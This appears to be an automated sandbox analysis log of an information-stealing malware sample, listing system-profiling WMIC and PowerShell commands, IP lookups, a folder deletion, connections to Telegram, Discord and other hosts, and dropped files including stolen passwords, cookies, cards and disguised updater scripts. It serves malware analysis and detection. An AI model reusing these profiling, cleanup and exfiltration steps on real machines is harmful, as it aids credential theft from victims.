C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 131.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 162.159.130.233:443 | discordapp.com | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.filedoge.com | udp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 134.193.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | www.myexternalip.com | udp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | mrbfederali.cam | udp |
| US | 8.8.8.8:53 | 44.118.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 104.21.93.60:443 | mrbfederali.cam | tcp |
| US | 104.21.93.60:80 | mrbfederali.cam | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 60.93.21.104.in-addr.arpa | udp |
| US | 162.159.130.233:443 | discordapp.com | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.166.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/1656-72-0x00007FFB53753000-0x00007FFB53755000-memory.dmp
memory/1656-73-0x0000023CD34E0000-0x0000023CD3502000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kvqwc2l.e23.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1656-83-0x00007FFB53750000-0x00007FFB54211000-memory.dmp
memory/1656-84-0x00007FFB53750000-0x00007FFB54211000-memory.dmp
memory/1656-85-0x0000023CED890000-0x0000023CED8D4000-memory.dmp
memory/1656-86-0x0000023CEDCB0000-0x0000023CEDD26000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.cmdline
| MD5 | 482e85c9cc35422c673a767724a45df9 |
| SHA1 | 8cf747c5a1bab551ec992bab4af9e5998d04ae46 |
| SHA256 | 192f3954d0c131fb98cbc5866fa6c5056e4e535d0f4a5b7a5b69b2a60b43ec30 |
| SHA512 | 8411338e58046e151c2d4eb05874436895aba211988fdebfd9aa4301e3e6ec1637c0c8b4137e61a6922dd5c4b94d47d3338816e81fb8521022042a0146fcb199 |
\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\CSCE254F21150E64C2A87A95ADCE1CA8C.TMP
| MD5 | f47f74f1c02038b80f67e4cdf6af32e9 |
| SHA1 | c527c16248a282dfe9d69f6bcf1180d8830b04d3 |
| SHA256 | 3513ec1916e320c459edd001176cb9b6f9892ddb36b720c8ca272b4bd621e320 |
| SHA512 | 1d212510ff42c87a04376b6b4aeef55d7d8ecb290e953bbeb496e14041b831f1216b3d4c58e76578e848cd217bcb38a627b26ab16c27f999c329131cd177d185 |
C:\Users\Admin\AppData\Local\Temp\RES3CF9.tmp
| MD5 | 05b527e109aba780f3e6c0ede3fe43c6 |
| SHA1 | 1a435724c132d2ea0b35c0d634835f8ecdf4a8ff |
| SHA256 | 937b977f49e998a10a8f14e0d3b9eb8a0bd3353b841ba822d94de0ce4eb6211d |
| SHA512 | 07fdb15ae6150f59c8e88a6533dd4f39dfadb2866e5912880bd7ca9900da7b12e6e4606e3edea0066689a445544bdb2c59fa35fcddd0bd2f8a7490e5efbe6e1a |
memory/1656-99-0x0000023CED860000-0x0000023CED868000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.dll
| MD5 | 5cb06aa13c5d736472e04b2cd5b7929d |
| SHA1 | e71870e1f00db4ca61990609c49f203b8e185eb3 |
| SHA256 | 1035d1641dbb654b0cb7dc8c57a74b88e5c9e656fc7b89d40dce87dc7ba172bb |
| SHA512 | faf5a57d030a77c5bda3652a0b65ccb1ac4a5e65e8e7b16b2299c36e74e52ef85906c491af2aea03958c1e3be221774fd9953f31917ae7c655c0437694e12812 |
memory/1656-103-0x00007FFB53750000-0x00007FFB54211000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/2556-115-0x000002723A220000-0x000002723A270000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1812c528169a46e922b94672409cf5b3 |
| SHA1 | 1d1d1511b71097205a93214a1056db23141e727f |
| SHA256 | 83bd505ff36cd8dc93f84cf6688ce92f3c1ecbb04f75314f92d8c91417009a30 |
| SHA512 | b9113ee163cd4e1d64a217cb2a3eb6fccfd21a2d66e8c8cd95f91f29fc19da8b98aa4048cbcad6e2d67a4c3056be01c09674eedb7b60e97f6c8fd97d62b9d251 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5fcfa95543a7088c79ff4dd7ce6cd352 |
| SHA1 | 5fc2045faf1c35ebf32907a4b8cf76874fd31f43 |
| SHA256 | e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e |
| SHA512 | b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | e4f5fdd7337110185b947e52670ce84d |
| SHA1 | bcba3cfbc5bec4343a69967ed80e544c0407f100 |
| SHA256 | 6bbbe434a86a4362ddd74788722840582bb7bdf99eaab5db8f476625d75cd772 |
| SHA512 | 336f5897f66a72881964b0d596e919066ba842a2c131f07ce0051bd466eaf68c7539e1ea37417883d067a35156bbbff60df037ffe1ba86a97ebfdf7084bdad5a |
\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.cmdline
| MD5 | ac3b98521c7e02ffa085ac0ffa2454cf |
| SHA1 | 9ea031d4adb3afa64ba4e319471f0656dc84a6c1 |
| SHA256 | aafc9159b94e1ee7b496361f6b4e8f7cbda6a51a5594ec2a2f0438f297941514 |
| SHA512 | bbce4e7bd7f11e7931bd5352b1cec3fdc0c844551a5ea4eedd6745f1f5fbd2501b34a1be56e129bdc04245c7b26bb1092f15c8d5aaecfeab56f10a62eec14e7a |
\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\CSC5E3344A173974038A1E0272D1BF8B215.TMP
| MD5 | bdcdf1f83b09726dda14b1027a95d1cd |
| SHA1 | fde20241e839610f61fee10fd4f3b3fed4f16d93 |
| SHA256 | 9ffb69675bc277e28ea1ed0415bf8a77a7fb3de8db986e7f7a4272c21b28c02d |
| SHA512 | 5faf0d53b16440dd7d7359042c8d2bdf37f1f79aae4be1b100a4c215f5b3ecc10241a5b0aab4549ef9f88c7a94622707d56754837eb9f9827f1f26c5cea96211 |
C:\Users\Admin\AppData\Local\Temp\RES4508.tmp
| MD5 | 3e8e9f2c18ea224f571fdaed3dd3ee49 |
| SHA1 | 8f1a9c177f31e706ac3b736fa06d09eb2e4878c0 |
| SHA256 | df7df0d39c3b4d03217306793f8f819462bf6a9a48a703c0a416999d399ab0a6 |
| SHA512 | b2d91734ba09a7b2f20327afa87a3630196df1e26b041011fd628c718c40b885f83d6e53782a7bdf172a30162084bdce03696b91dc25d3b7d0196537c94bba5d |
memory/1784-191-0x00000230FF620000-0x00000230FF628000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.dll
| MD5 | 8621df3150a97462cfe2058a8d53730b |
| SHA1 | 589751968d505361a38d5cff9c98b0d3459e8faa |
| SHA256 | cc84cb292112b8579838d722f0e63d20659976d527684b0a7c0518abbc87a6e3 |
| SHA512 | 145d87a90533d09c74800c6a2329d47801ad17ec325dfb7c04a7a3f3a98ecfefe21cb4df580c257a91f9389ad90ab9ec97dc1cb4edc0f4801d04fe1b91f8f076 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f07704f4a24121f36c4888d3ab67c85 |
| SHA1 | f0da922bbaca04b6796051bf750d80542adf9dfa |
| SHA256 | e905f4d51db0f8013bc3d7ec610e4f998d4cdc42563948d85cee36b7cb762582 |
| SHA512 | 7f7606c637bfbf8d873f89f044b943d00fc0ba4cca5e33b55e162a157397ba30fcafbf364ce81d1cd66a85c1fe06d4931819646e44dfa2a2c5e108f983034b2b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d75098c0d683ab68bcad88feffc8407 |
| SHA1 | 8ed6555a018df6970328138891555c55acc02f51 |
| SHA256 | dee25e8f5a0d340384eb982c3bfdf950d3ac5d1d56de89678a2acf456f7ac513 |
| SHA512 | 448f050c76d7dbe77eda77b7ff9ce4bafc93215c648ec83c904af98fa5005e82fe10651a352d4cf074674ae6de3b2426d888b75cbf833768d3c379e5ad725391 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\stolen_files.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Serial-Check.txt
| MD5 | f76a9d2bc8f58b92547d5f0acd7a7318 |
| SHA1 | 5c8a6a5aba21123ba11a273627731c009830bca3 |
| SHA256 | 8aea538a43e07b959e4c5bd93e27a119c4418031fcc5bc6fabc28dff4e1e2903 |
| SHA512 | c1a38f9e32f0e6a364f4504e3a3bf93298c78d5b826aee42af444321951b3380a1934d65f30dadccb7301cb831f2013c428299b0e639b78900ea846f217a3351 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Passwords\Passwords.txt
| MD5 | c5e74f3120dbbd446a527e785dfe6d66 |
| SHA1 | 11997c2a53d19fd20916e49411c7a61bfb590e9c |
| SHA256 | e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05 |
| SHA512 | a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Discord\discord.txt
| MD5 | 675951f6d9d75fd2c9c06b5ff547c6fd |
| SHA1 | 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09 |
| SHA256 | 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244 |
| SHA512 | 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\debug.log
| MD5 | 8b23d24f4f7b760312d0b19fc175bf2b |
| SHA1 | 2e5cbee1b8c2dac559a6acf48906a9141ab68dd5 |
| SHA256 | d7e932bdcc8fe47a442a281b37459797b68a47f88b19d383ac99576f8f34ea7d |
| SHA512 | 0c48cb6c88a5e2ec0d6e992d28015aa4001bf8eeb9a0479485a84ac09e91603ce1855228495925d149a04e142a6daf4a45c3ddc0a01b3a6c89e316dd20b665f2 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Cookies\Google_Default.txt
| MD5 | 2ffb2630baa98fe54083de0417824a43 |
| SHA1 | c61ff825bfafa7cc542af941ec1c44fd82368e8c |
| SHA256 | 31775ab1612339763d80dddfd833142d534f8fbd4998aec0a7eb866f73396a28 |
| SHA512 | 19542276006dfe89b87d81d15925c3d6fceb27d5b49612ff59d09ec3f866b206a89a75c82d8f79a678c9b80dad4aa773c79507ad2e56570138ec851047df3e29 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Cards\Cards.txt
| MD5 | 8a0ed121ee275936bf62b33f840db290 |
| SHA1 | 898770c85b05670ab1450a96ea6fbd46e6310ef6 |
| SHA256 | 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709 |
| SHA512 | 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Autofills\Autofills.txt
| MD5 | 2f308e49fe62fbc51aa7a9b987a630fe |
| SHA1 | 1b9277da78babd9c5e248b66ba6ab16c77b97d0b |
| SHA256 | d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521 |
